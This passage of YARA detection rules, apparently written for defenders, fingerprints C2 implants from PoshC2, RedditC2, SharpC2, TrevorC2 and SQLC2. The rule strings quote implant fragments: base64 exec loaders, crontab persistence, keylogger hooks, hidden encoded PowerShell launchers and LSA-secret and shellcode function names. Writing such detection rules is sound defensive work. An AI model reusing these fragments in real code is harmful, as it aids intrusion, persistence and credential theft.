      $s8  = "else: r=urllib2.Request(url,headers={'User-agent':ua})" fullword ascii
      $s9  = "hn=socket.gethostname();o=urllib2.build_opener()" fullword ascii
      $s10 = "exec(base64.b64decode(x))" fullword ascii
      $s11 = "html = response.read().decode('utf-8');x=decrypt(key, html)" fullword ascii
      $s12 = "ua=\"#REPLACEUSERAGENT#\"" fullword ascii
      $s13 = "url=serverclean[0]+\"#REPLACEQUICKCOMMAND#\"" fullword ascii
      $s14 = "res=urllib2.urlopen(r);html=res.read();x=decrypt(key, html).rstrip('\\0');" fullword ascii
      $s15 = "serverclean=[#REPLACEHOSTPORT#]" fullword ascii
      $s16 = "pykey=\"#REPLACESPYTHONKEY#\"" fullword ascii
      $s17 = "if pykey in b and pyhash == s and cstr < kdn: " fullword ascii
      $s18 = "import os,sys,base64,ssl,socket,pwd,hashlib,time" fullword ascii
      $s19 = "kdn=time.strptime(\"#REPLACEKILLDATE#\",\"%Y-%m-%d\")" fullword ascii
      $s20 = "cstr=time.strftime(\"%Y-%m-%d\",time.gmtime());cstr=time.strptime(cstr,\"%Y-%m-%d\")" fullword ascii
   condition:
      hash.sha256(0, filesize) == "33827cd5a6e15bbaf99e65f767e65e1b639f48d6b6bb7a6e9e8c8cf02355a1e7" or
      uint16(0) == 0x6d69 and filesize < 6KB and
      8 of them
}

rule PoshC2_ImplantCorePy {
   meta:
      description = "PoshC2 - Implant-Core.py"
      sha256 = "8653f19782f1e19e86caf6fdadc17790eb9d68ff34c8a249e9e9e26ba8000c88"
   strings:
      $x1  = "  # keylogger imported from https://raw.githubusercontent.com/EmpireProject/Empire/fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4/lib/" ascii
      $x2  = "  # keylogger imported from https://raw.githubusercontent.com/EmpireProject/Empire/fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4/lib/" ascii
      $s3  = "  s.call(\"crontab -l | { cat; echo '* 10 * * * sh %%s'; } | crontab -\" %% filename, shell=True)" fullword ascii
      $s4  = "  modpayload = modb64logger.replace(\"REPLACEME\",filename)" fullword ascii
      $s5  = "  returnval = \"%%s \\\\r\\\\nKeylogger started here: %%s\" %% (pids, filename)" fullword ascii
      $s6  = "  filename = \"%%s/%%s_psh.sh\" %% (dircontent, uuid.uuid4().hex)" fullword ascii
      $s7  = "  dircontent = \"%%s/.%%s\" %% (os.environ['HOME'], uuid.uuid4().hex)" fullword ascii
      $s8  = "            if hh[0]: req=urllib2.Request(server,dataimagebytes,headers={'Host':str(hh[0]),'User-agent':str(ua),'Cookie':\"Sessi" ascii
      $s9  = "  returnval = \"Ran Start Another Implant - File dropped: %%s\" %% filename" fullword ascii
      $s10 = "                returnval = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)" fullword ascii
      $s11 = "  aes = get_encryption(key, iv)" fullword ascii
      $s12 = "      if hh[0]: req=urllib2.Request(server,headers={'Host':str(hh[0]),'User-agent':str(ua)})" fullword ascii
      $s13 = "  import subprocess as s" fullword ascii
      $s14 = "modules/python/collection/osx/keylogger.py" fullword ascii
      $s15 = "            if hh[0]: req=urllib2.Request(server,dataimagebytes,headers={'Host':str(hh[0]),'User-agent':str(ua),'Cookie':\"Sessi" ascii
      $s16 = "            postcookie = encrypt(key, taskId).decode(\"utf-8\")" fullword ascii
      $s17 = "  import subprocess" fullword ascii
      $s18 = "  exec(modpayload)" fullword ascii
      $s19 = "  s.call(\"crontab -l | { cat;  } | grep -v '_psh.sh'| crontab -\", shell=True)" fullword ascii
      $s20 = "  modb64logger = base64.b64decode(b64logger)" fullword ascii
   condition:
      hash.sha256(0, filesize) == "8653f19782f1e19e86caf6fdadc17790eb9d68ff34c8a249e9e9e26ba8000c88" or
      uint16(0) == 0x6d69 and filesize < 40KB and
      1 of ($x*) and 4 of them
}

rule PoshC2_ImplantCoreJS {
   meta:
      description = "PoshC2 - Implant-Core.js"
      sha256 = "0b5c8f00eeaa6a63764f7f4807b53b37696882027443cf458895409c07aad26a"
   strings:
      $x1  = "// pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/shell.js#L2-L23" fullword ascii
      $x2  = "// pulled fromhttps://github.com/its-a-feature/Mythic/blob/14b06e3755cea0f291ea6246fc315b9b30388640/Payload_Types/apfell/agent_c" ascii
      $x3  = "// pulled fromhttps://github.com/its-a-feature/Mythic/blob/14b06e3755cea0f291ea6246fc315b9b30388640/Payload_Types/apfell/agent_c" ascii
      $x4  = "// pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/base/apfell-jxa.js#L116-L124" fullword ascii
      $x5  =  "// pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/c2_profiles/HTTP.js#L115-L132" ascii
      $x6  = "// pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/base/apfell-jxa.js#L9-L30" fullword ascii
      $x7  = "// pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/base/apfell-jxa.js#L70-L74" fullword ascii
      $x8  = "// Pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/base/apfell-jxa.js#L2-L7" fullword ascii
      $x9  = "//console.log(\"Running command: \" + command);" fullword ascii
      $x10 = "// pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/base/apfell-jxa.js#L106-L115" fullword ascii
      $s11 = "        //console.log(\"From Server: \" + readCommandClear);" fullword ascii
      $s12 = "    //console.log(\"host header: \" + h);" fullword ascii
      $s13 = "this.pid = this.procInfo.processIdentifier;" fullword ascii
      $s14 = "//simply run a shell command via doShellScript and return the response" fullword ascii
      $s15 = "response = currentApp.doShellScript(command);" fullword ascii
      $s16 = "    //console.log(\"in shell\");" fullword ascii
      $s17 = "this.procInfo = $.NSProcessInfo.processInfo;" fullword ascii
      $s18 = "this.osVersion = this.procInfo.operatingSystemVersionString.js;" fullword ascii
      $s19 = "    let decryptedData = $.SecTransformExecute(decrypt, Ref());" fullword ascii
      $s20 = "    let encryptedData = $.SecTransformExecute(encrypt, err);" fullword ascii
   condition:
      hash.sha256(0, filesize) == "0b5c8f00eeaa6a63764f7f4807b53b37696882027443cf458895409c07aad26a" or
      uint16(0) == 0x2f2f and filesize < 40KB and
      1 of ($x*) and all of them
}

rule PoshC2_ImplantCorePs1 {
   meta:
      description = "PoshC2 - Implant-Core.ps1"
      sha256 = "6d520463f8563d6a296d22b6824c690c9b6de8121c9b6f08307947874667c5f2"
   strings:
      $x1  = "$payloadraw = \"powershell -exec bypass -Noninteractive -windowstyle hidden -e $($EncodedPayloadScript)\"" fullword ascii
      $s2  = "$EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript))" fullword ascii
      $s3  = "$NewScript = \"sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64Stri" ascii
      $s4  = "$ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($payloadclear)" fullword ascii
      $s5  = "g(`\"$EncodedCompressedScript`\"),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()\"" fullword ascii
      $s6  = "    $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16)" fullword ascii
      $s7  = "    $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);" fullword ascii
      $s8  = "$EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)" fullword ascii
      $s9  = "$payload = $payloadraw -replace \"`n\", \"\"" fullword ascii
      $s10 = "$NewScript = \"sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64Stri" ascii
      $s11 = "    [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([System.Text.Encoding]::UTF8.GetString($unencrypte" ascii
      $s12 = "    [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([System.Text.Encoding]::UTF8.GetString($unencrypte" ascii
      $s13 = "                      $splitcmd = $ReadCommandClear -replace \"multicmd\",\"\"" fullword ascii
      $s14 = "    $output = (New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$unencrypte" ascii
      $s15 = "                                  if ($ReadCommandClear -match (\"(.+)Base64\")) { $result = $Matches[0] } # $result doesn't app" ascii
      $s16 = "    $output = (New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$unencrypte" ascii
      $s17 = "                                  if ($ReadCommandClear -match (\"(.+)Base64\")) { $result = $Matches[0] } # $result doesn't app" ascii
      $s18 = "function Decrypt-String($key, $encryptedStringWithIV) {" fullword ascii
      $s19 = "dData)), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd()" fullword ascii
      $s20 = "          if (($ReadCommandClear) -and ($ReadCommandClear -ne \"fvdsghfdsyyh\")) {" fullword ascii
   condition:
      hash.sha256(0, filesize) == "6d520463f8563d6a296d22b6824c690c9b6de8121c9b6f08307947874667c5f2" or
      uint16(0) == 0x6b24 and filesize < 40KB and
      1 of ($x*) and 4 of them
}

rule PoshC2_PbindPs1 {
   meta:
      description = "PoshC2 - pbind.ps1"
      sha256 = "696e2d58b3a3d21ef422fc5103c4cc1a601f359ee1721eb9ecb099be95f229a7"
   strings:
      $s1  = "                $decCommand = Decrypt-String -key $key -encryptedStringWithIV $command" fullword ascii
      $s2  = "        $decCommand = Decrypt-String -key $key -encryptedStringWithIV $command" fullword ascii
      $s3  = "    $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16)" fullword ascii
      $s4  = "                    $encCommand2 = Encrypt-String -unencryptedString $res -Key $key" fullword ascii
      $s5  = "                $encCommand = Encrypt-String -unencryptedString 'COMMAND' -Key $key" fullword ascii
      $s6  = "                    $encbad = Encrypt-String -unencryptedString 'This should never fire! - crypto failure' -Key $key" fullword ascii
      $s7  = "$Pipe = New-Object System.IO.Pipes.NamedPipeServerStream($pname,'InOut',100, 'Byte', 'None', 4096, 4096, $PipeSecurity)" fullword ascii
      $s8  = "                        if ($decCommand -eq 'KILLPIPE'){exit}" fullword ascii
      $s9  = "invoke-pserv -secret #REPLACEPBINDSECRET# -key #REPLACEKEY# -pname #REPLACEPBINDPIPENAME#" fullword ascii
      $s10 = "                $command = $pipeReader.ReadLine()" fullword ascii
      $s11 = "$PipeSecurity = New-Object System.IO.Pipes.PipeSecurity" fullword ascii
      $s12 = "$AccessRule = New-Object System.IO.Pipes.PipeAccessRule( 'Everyone', 'ReadWrite', 'Allow' )" fullword ascii
      $s13 = "        $command = $pipeReader.ReadLine()" fullword ascii
      $s14 = "    $bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString)" fullword ascii
      $s15 = "                    $fileContentBytes = [System.Text.Encoding]::Unicode.GetBytes($res)" fullword ascii
      $s16 = "    [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0)" fullword ascii
      $s17 = "        {$aesManaged.Key = [System.Convert]::FromBase64String($key)}" fullword ascii
      $s18 = "    $bytes = [System.Convert]::FromBase64String($encryptedStringWithIV)" fullword ascii
      $s19 = "        if ($decCommand -eq 'EXIT') { break }" fullword ascii
      $s20 = "        $encSure = Encrypt-String -unencryptedString 'SURE' -Key $key" fullword ascii
   condition:
      hash.sha256(0, filesize) == "696e2d58b3a3d21ef422fc5103c4cc1a601f359ee1721eb9ecb099be95f229a7" or
      uint16(0) == 0x7566 and filesize < 10KB and
      8 of them
}

rule PoshC2_Shellcode {
   meta:
      description = "PoshC2 - Sharp_v2_x64_dll.b64, Sharp_v2_x64_Shellcode.b64, Sharp_v2_x86_dll.b64, Sharp_v2_x86_Shellcode.b64, Sharp_v4_x64_dll.b64, Sharp_v4_x64_Shellcode.b64, Sharp_v4_x86_dll.b64, Sharp_v4_x86_Shellcode.b64"
      sha256_1 = "dd654eb75c1f3736d4b5282e7338a5efcbd7481fc7b46ec38a3ff0ea573c408e"
      sha256_2 = "cb96cca9101899754efc33859353e0834496a98ee4381b1a9158c7403e1562d2"
      sha256_3 = "03c10e261a138666a1c5cf9cb577e8d73e041b1dae0a3d1198d116e4c2b5dec3"
      sha256_4 = "04ced8976f86801a23ee5fa1fb33f7cab5638039fb6d2a441a169784ce37adf9"
      sha256_5 = "ce950ee11e27e0a95840fa12c878af19910aa82d1ccd5eb99ab99c4131571989"
      sha256_6 = "fc454c2453d9cf6b64c0e6ffab76e6f26c584698a454c7cf2e07d96b11a29fb6"
      sha256_7 = "ddc5047d6a8bb245644c5385ead8fa0d3b751f2aabf9e88e423e0b9862e65019"
      sha256_8 = "f83bbf7318f982ddb457863cf2b45e13c402c2eff5bb1a4d5b8f074295ff46f9"
   strings:
      $s1 = "QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB" ascii
      $s2 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ascii
      $s3 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ascii
      $s4 = "ACAAAAAAAAA" ascii
      $s5 = "ABAAAAAAAAA" ascii
      $s6 = "AAAADAAAAA" ascii
      $s7 = "EAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ascii
      $s8 = "AAAABAAAAA" ascii
      $s9 = "AbAAAAAAAc" ascii
      $s10 = "AAAACAAAAA" ascii
      $s11 = "AAAAAAAAAAAAAAAAAAA" ascii
   condition:
      hash.sha256(0, filesize) == "dd654eb75c1f3736d4b5282e7338a5efcbd7481fc7b46ec38a3ff0ea573c408e" or
      hash.sha256(0, filesize) == "cb96cca9101899754efc33859353e0834496a98ee4381b1a9158c7403e1562d2" or
      hash.sha256(0, filesize) == "03c10e261a138666a1c5cf9cb577e8d73e041b1dae0a3d1198d116e4c2b5dec3" or
      hash.sha256(0, filesize) == "04ced8976f86801a23ee5fa1fb33f7cab5638039fb6d2a441a169784ce37adf9" or
      hash.sha256(0, filesize) == "ce950ee11e27e0a95840fa12c878af19910aa82d1ccd5eb99ab99c4131571989" or
      hash.sha256(0, filesize) == "fc454c2453d9cf6b64c0e6ffab76e6f26c584698a454c7cf2e07d96b11a29fb6" or
      hash.sha256(0, filesize) == "ddc5047d6a8bb245644c5385ead8fa0d3b751f2aabf9e88e423e0b9862e65019" or
      hash.sha256(0, filesize) == "f83bbf7318f982ddb457863cf2b45e13c402c2eff5bb1a4d5b8f074295ff46f9" or
      (((uint16(0) == 0x5654 or uint16(0) == 0x4136) and filesize < 600KB and (8 of them)) or (all of them))
}


- Reddit C2

import "hash"

rule RedditC2_ImplantUNIX {
   meta:
      description = "RedditC2 - implant.py"
      sha256 = "dba80b543f6d39f2d0631f6cfebef961259746e6f70fb0cf1431e85343ba7d32"
   strings:
      $s1  = "    listener_session = subprocess.getoutput('hostname')" fullword ascii
      $s2  = "                    if(\"in:\" in top_level_comment.body and top_level_comment.id not in self.processed_comments):" fullword ascii
      $s3  = "    i = Implant(client_id, client_secret, username, password, subreddit, listener_session, user_agent, xor_key)" fullword ascii
      $s4  = "    output = subprocess.getoutput(command)" fullword ascii
      $s5  = "    def __init__(self, client_id, client_secret, username, password, subreddit_name, listener_name, user_agent, xor_key):" fullword ascii
      $s6  = "def runTask(command):" fullword ascii
      $s7  = "            ciphertext = \"powershell.exe \" + ciphertext[11:]" fullword ascii
      $s8  = "def decrypt(encoded_text, key):" fullword ascii
      $s9  = "                        self.processed_comments.append(top_level_comment.id)" fullword ascii
      $s10 = "        print(\"[+] Received task to execute: \" + ciphertext)" fullword ascii
      $s11 = "        self.processed_comments = []" fullword ascii
      $s12 = "        if(command[:8] == \"download\"):" fullword ascii
      $s13 = "    user_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/" ascii
      $s14 = "def encrypt(plaintext, key):" fullword ascii
      $s15 = "def xor_encrypt(plaintext, key):" fullword ascii
      $s16 = "    user_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/" ascii
      $s17 = "        new_comment_body = comment_body.replace('in', 'executed')" fullword ascii
      $s18 = "        self.subreddit.submit(self.listener_name, selftext=postContent)" fullword ascii
      $s19 = "def base64_decode(encoded_text):" fullword ascii
      $s20 = "            output = runTask(command)" fullword ascii
   condition:
      hash.sha256(0, filesize) == "dba80b543f6d39f2d0631f6cfebef961259746e6f70fb0cf1431e85343ba7d32" or
      uint16(0) == 0x6d69 and filesize < 20KB and
      8 of them
}

rule RedditC2_ImplaintWin {
   meta:
      description = "RedditC2 - RedditAgent.exe"
      sha256 = "8b534d0f9f699d6a02aca559f2699d914b0b3f8749e0d206bece0fe09b92ccc6"
   strings:
      $s1 = "RedditAgent.exe" fullword wide
      $s2 = "set_UseShellExecute" fullword ascii
      $s3 = "[+] Created agent session: " fullword wide
      $s4 = "run hostname" fullword wide
      $s5 = "powershell" fullword wide
      $s6 = "myPassword" fullword wide
      $s7 = "myxorkey" fullword wide
      $s8 = ".NETFramework,Version=v4.7.2" fullword ascii
      $s9 = ".NET Framework 4.7.2" fullword ascii
      $s10 = "E:\\Work\\Analysis\\" fullword ascii
      $s11 = "[+] File uploaded successfully" fullword wide
      $s12 = "createPost" fullword ascii
      $s13 = "encryptedMessage" fullword ascii
      $s14 = "RedditAgent" fullword wide
      $s15 = "SubmitTextPost" fullword ascii
      $s16 = "GetSubreddit" fullword ascii
      $s17 = "postText" fullword ascii
      $s18 = "xorkey" fullword ascii
      $s19 = "listenerID" fullword ascii
      $s20 = "RedditSharp.Things" fullword ascii
   condition:
      hash.sha256(0, filesize) == "8b534d0f9f699d6a02aca559f2699d914b0b3f8749e0d206bece0fe09b92ccc6" or
      uint16(0) == 0x5a4d and filesize < 20KB and
      8 of them
}


- SharpC2

import "pe"
import "hash"

rule SharpC2Exe {
   meta:
      description = "SharpC2 - SharpC2.exe"
      sha256 = "162fc5cdd4ed03ab16da5edd076bc05e87dae1a41b053dddbcc8cac06baa8a63"
   strings:
      $s1  = "hostfxr.dll" fullword wide
      $s2  = "--- Invoked %s [version: %s, commit hash: %s] main = {" fullword wide
      $s3  = "This executable is not bound to a managed DLL to execute. The binding value is: '%s'" fullword wide
      $s4  = "SharpC2.dll" fullword wide
      $s5  = "D:\\a\\_work\\1\\s\\artifacts\\obj\\win-x64.Release\\corehost\\apphost\\standalone\\apphost.pdb" fullword ascii
      $s6  = "The managed DLL bound to this executable is: '%s'" fullword wide
      $s7  = "A fatal error was encountered. This executable was not bound to load a managed DLL." fullword wide
      $s8  = "Showing error dialog for application: '%s' - error code: 0x%x - url: '%s' - dialog message: %s" fullword wide
      $s9  = "Failed to resolve full path of the current executable [%s]" fullword wide
      $s10 = "https://go.microsoft.com/fwlink/?linkid=798306" fullword wide
      $s11 = "The managed DLL bound to this executable could not be retrieved from the executable image." fullword wide
      $s12 = "Could not load 'kernel32.dll': %u" fullword wide
      $s13 = "Download the .NET runtime:" fullword wide
      $s14 = "IsWow64Process2" fullword ascii
      $s15 = "  - Installing .NET prerequisites might help resolve this problem." fullword wide
      $s16 = "  - https://aka.ms/dotnet-core-applaunch?" fullword wide
      $s17 = "Bundle header version compatibility check failed." fullword wide
      $s18 = "Failed to load the dll from [%s], HRESULT: 0x%X" fullword wide
      $s19 = "The required library %s does not support relative app dll paths." fullword wide
      $s20 = "Call to IsWow64Process2 failed: %u" fullword wide
   condition:
      hash.sha256(0, filesize) == "162fc5cdd4ed03ab16da5edd076bc05e87dae1a41b053dddbcc8cac06baa8a63" or
      pe.sections[4].name == "_RDATA" and
      pe.imports("kernel32.dll", "TerminateProcess") and
      pe.imports("shell32.dll", "ShellExecuteW") and
      pe.imports("kernel32.dll", "IsDebuggerPresent") and
      pe.imports("kernel32.dll", "FindFirstFileExW") and
      uint16(0) == 0x5a4d and filesize < 500KB and
      8 of them
}

rule SharpC2Dll {
   meta:
      description = "SharpC2 - SharpC2.dll"
      sha256 = "ce0fe31e5c1fe918f766ab2e83daaac9e58cce3972c0872f8d1b2de03417528f"
   strings:
      $s1  = "SharpC2.dll" fullword wide
      $s2  = "RClient.Components.Pivots.ReversePortForwardTable+<OnReversePortForwardCreated>d__7" fullword ascii
      $s3  = "AClient.Components.Pivots.ReversePortForwardTable+<AddForward>d__5" fullword ascii
      $s4  = "RClient.Components.Pivots.ReversePortForwardTable+<OnReversePortForwardDeleted>d__6" fullword ascii
      $s5  = "DClient.Components.Pivots.ReversePortForwardTable+<DeleteForward>d__9" fullword ascii
      $s6  = "HClient.Components.Pivots.ReversePortForwardTable+<OpenCreateForward>d__8" fullword ascii
      $s7  = "__Blazor.Client.Components.Tasks.ProcessListing" fullword ascii
      $s8  = "C:\\Tools\\SharpC2\\Client\\obj\\Release\\net7.0-windows10.0.19041.0\\win10-x64\\SharpC2.pdb" fullword ascii
      $s9  = "IClient.Components.Pivots.ReversePortForwardTable+<OnInitializedAsync>d__4" fullword ascii
      $s10 = "KClient.Components.Pivots.CreateReversePortForward+<OnInitializedAsync>d__12" fullword ascii
      $s11 = "7Client.Components.Handlers.HostAFile+<UploadFiles>d__22" fullword ascii
      $s12 = "SHELLCODE" fullword wide
      $s13 = "Microsoft.ui.xaml.dll" fullword ascii
      $s14 = "0Client.Services.SharpC2Api+<GetHostedFiles>d__26" fullword ascii
      $s15 = "8Client.Services.SharpC2Api+<GetReversePortForwards>d__42" fullword ascii
      $s16 = "7Client.Services.SharpC2Api+<GetReversePortForward>d__43" fullword ascii
      $s17 = "__Blazor.Client.Components.Pivots.CreateReversePortForward" fullword ascii
      $s18 = ";Client.Components.Handlers.HttpHandlers+<OpenHostFile>d__10" fullword ascii
      $s19 = "9Client.Components.Events.WebLogs+<OnInitializedAsync>d__3" fullword ascii
      $s20 = "__Blazor.Client.Components.Pivots.ReversePortForwardTable" fullword ascii
      $s21 = "MemoryStream" fullword ascii
   condition:
      hash.sha256(0, filesize) == "ce0fe31e5c1fe918f766ab2e83daaac9e58cce3972c0872f8d1b2de03417528f" or
      uint16(0) == 0x5a4d and filesize < 2000KB and
      8 of them
}

rule SharpC2_API {
   meta:
      description = "SharpC2 - SharpC2.API.dll"
      sha256 = "720ded9560168b206152cceab0fcfa8138ad92311a0cf4b5bdf7ba0bd8074839"
   strings:
      $s1  = "SharpC2.API.dll" fullword wide
      $s2  = "C:\\Tools\\SharpC2\\SharpC2.API\\obj\\Release\\netstandard2.0\\SharpC2.API.pdb" fullword ascii
      $s3  = "get_PayloadType" fullword ascii
      $s4  = "get_ForwardPort" fullword ascii
      $s5  = "Payloads" fullword ascii
      $s6  = "get_BindPort" fullword ascii
      $s7  = "get_ForwardHost" fullword ascii
      $s8  = "<PayloadType>k__BackingField" fullword ascii
      $s9  = "set_PayloadType" fullword ascii
      $s10 = "/api/v1/payloads" fullword wide
      $s11 = "ReversePortForwardRequest" fullword ascii
      $s12 = "<ForwardPort>k__BackingField" fullword ascii
      $s13 = "get_ConnectAddress" fullword ascii
      $s14 = "ReversePortForwardResponse" fullword ascii
      $s15 = "get_ConnectPort" fullword ascii
      $s16 = "get_SourceAddress" fullword ascii
      $s17 = "set_ForwardPort" fullword ascii
      $s18 = "set_PipeName" fullword ascii
      $s19 = "SharpC2.API.Requests" fullword ascii
      $s20 = "SharpC2.API.Responses" fullword ascii
   condition:
      hash.sha256(0, filesize) == "720ded9560168b206152cceab0fcfa8138ad92311a0cf4b5bdf7ba0bd8074839" or
      uint16(0) == 0x5a4d and filesize < 100KB and
      8 of them
}


- Trevor C2

import "pe"
import "hash"

rule TrevorC2_Win {
   meta:
      description = "TrevorC2 - tc2_client.exe"
      sha256 = "11d05c91663798116f6426c24166bdd648c519f6f95bdff4659dd56c575e7978"
   strings:
      $s1  = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.37 E" ascii
      $s2  = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.37 E" ascii
      $s3  = "  VirtualQuery failed for %d bytes at address %p" fullword ascii
      $s4  = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p." fullword ascii
      $s5  = "magic_hostname=%s" fullword ascii
      $s6  = "Tr3v0rC2R0x@nd1s@w350m3#TrevorForget" fullword ascii
      $s7  = "%s?%s%s" fullword ascii
      $s8  = "<!-- oldcss=" fullword ascii
      $s9  = "killnow" fullword ascii
      $s10 = "sessionid=" fullword ascii
      $s11 = "  VirtualProtect failed with code 0x%x" fullword ascii
      $s12 = "Cookie: sessionid=%s" fullword ascii
      $s13 = "  Unknown pseudo relocation protocol version %d." fullword ascii
      $s14 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" ascii
      $s15 = "192.168.1.175" fullword ascii
      $s16 = "connect" fullword ascii
      $s17 = "socket" fullword ascii
      $s18 = ":MZuYHcB<H" fullword ascii
      $s19 = "=UUUUw" fullword ascii
      $s20 = "ATUWVSHcY" fullword ascii
   condition:
      hash.sha256(0, filesize) == "11d05c91663798116f6426c24166bdd648c519f6f95bdff4659dd56c575e7978" or
      pe.imports("ws2_32.dll", "send") and
      pe.imports("kernel32.dll", "VirtualProtect") and
      pe.imports("msvcrt.dll", "rand") and
      pe.imports("kernel32.dll", "VirtualQuery") and
      uint16(0) == 0x5a4d and filesize < 200KB and
      8 of them
}

rule TrevorC2_UNIX {
   meta:
      description = "TrevorC2 - tc2_client.out"
      sha256 = "39391bffd11e6e525b02ea4cd5b3b4422c072126424b7031db346d260a4bd127"
   strings :
      $s1  = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.37 E" ascii
      $s2  = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.37 E" ascii
      $s3  = "magic_hostname=%s" fullword ascii
      $s4  = "Tr3v0rC2R0x@nd1s@w350m3#TrevorForget" fullword ascii
      $s5  = "%s?%s%s" fullword ascii
      $s6  = "<!-- oldcss=" fullword ascii
      $s7  = "killnow" fullword ascii
      $s8  = "sessionid=" fullword ascii
      $s9  = "Cookie: sessionid=%s" fullword ascii
      $s10 = ".note.gnu.build-id" fullword ascii
      $s11 = ".note.gnu.property" fullword ascii
      $s12 = ".note.ABI-tag" fullword ascii
      $s13 = ".eh_frame_hdr" fullword ascii
      $s14 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" ascii
      $s15 = "192.168.1.175" fullword ascii
      $s16 = "connect" fullword ascii
      $s17 = "socket" fullword ascii
      $s18 = "Accept: text/html" fullword ascii
      $s19 = "_ITM_deregisterTMCloneTable" fullword ascii
      $s20 = "libc.so.6" fullword ascii
   condition:
      hash.sha256(0, filesize) == "39391bffd11e6e525b02ea4cd5b3b4422c072126424b7031db346d260a4bd127" or
      uint16(0) == 0x457f and filesize < 80KB and
      8 of them
}


- SQLC2

import "pe"
import "hash"

rule Sqlc2cmds {
   meta:
      description = "Sqlc2cmds - sqlc2cmds.dll"
      sha256 = "019fa586cbbdc875e72e614ab1917a93bcbc14bb0fa1731d0643b93c3763db2a"
   strings:
      $x1  = "C:\\Windows\\System32\\cmd.exe" fullword wide
      $s2  = "sqlc2cmds.dll" fullword wide
      $s3  = "WMI command executed" fullword wide
      $s4  = "\\\\127.0.0.1\\root\\cimv2:Win32_Process" fullword wide
      $s5  = "base64EncodedPayload" fullword ascii
      $s6  = "run_shellcode" fullword ascii
      $s7  = "run_command" fullword ascii
      $s8  = "run_command_ps" fullword ascii
      $s9  = "run_command_wmi" fullword ascii
      $s10 = "run_getusercon" fullword ascii
      $s11 = "send_http_get" fullword ascii
      $s12 = "execTsql" fullword ascii
      $s13 = "get_lsa_secrets" fullword ascii
      $s14 = "send_http_post" fullword ascii
      $s15 = "run_getprocs" fullword ascii
      $s16 = "entriesread" fullword ascii
      $s17 = "read_file_bin" fullword ascii
      $s18 = "fileContent" fullword ascii
      $s19 = "OriginatingHost" fullword ascii
      $s20 = "PostRequest" fullword ascii
   condition:
      hash.sha256(0, filesize) == "019fa586cbbdc875e72e614ab1917a93bcbc14bb0fa1731d0643b93c3763db2a" or
      uint16(0) == 0x5a4d and filesize < 40KB and
      1 of ($x*) and 4 of them
}


Conslusion

This educational material has been created with the goal of assisting network defenders and incident responders in developing methodologies for C2 activity detection based on popular frameworks. Besides red teaming, C2s are widely used by adversaries in the post-exploitation stage, where, in practice, the actor prefers to minimize any network communications as well as modules that could be detected by signatures.

